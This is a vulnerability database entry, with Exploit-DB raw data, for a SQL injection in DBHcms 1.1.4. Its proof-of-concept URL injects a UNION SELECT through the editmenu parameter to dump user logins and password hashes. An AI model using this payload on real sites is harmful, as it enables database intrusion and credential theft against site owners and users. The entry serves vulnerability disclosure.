DBHcms 1.1.4 SQL Injection Vulnerability

vendor:

DBHcms

by:

ZonTa

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: DBHcms

Affected Version From: 1.1.4

Affected Version To: 1.1.4

Patch Exists: NO

Related CWE: N/A

CPE: a:drbenhur:dbhcms:1.1.4

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Apache, PHP5

2010

DBHcms 1.1.4 SQL Injection Vulnerability

The DBHcms is a Open Source content management system for personal and small business websites. An attacker can exploit a SQL injection vulnerability in DBHcms 1.1.4 by sending a specially crafted HTTP request to the vulnerable application. This can allow the attacker to gain access to the database and execute arbitrary SQL commands.

Mitigation:

Not yet released.

Source

Exploit-DB raw data:

DBHcms 1.1.4 SQL Injection Vulnerability

# Exploit Title:    DBHcms 1.1.4 SQL Injection Vulnerability
# Date: 24-10-2010 
# Author: ZonTa
# Mail: zontahackers[at]gmail[dot]com 
# IM : zontahackers[at]live[dot]com

# Software Link:    http://www.drbenhur.com/downloads-dbhcms-114-1-69-en.html
# Version: 1.1.4
# Tested on: Apache,PHP5


ABOUT
--------------

The DBHcms is a Open Source content management system for personal
and small business websites. It is search engine optimized, also
for multiple languages simultaneously by allowing the search engine
bot to index every single page.


POC
--------------

http://192.168.1.100/DBHcms/index.php?dbhcms_pid=-81&editmenu=-2+union+select+1,2,3,4,5,6,group_concat(user_login,0x3a,user_passwd),8,9,10,11,12,13,14+from+dbhcms_cms_users--


FIX
--------------

Not yet released.


Greetz to Sri Lankanz ~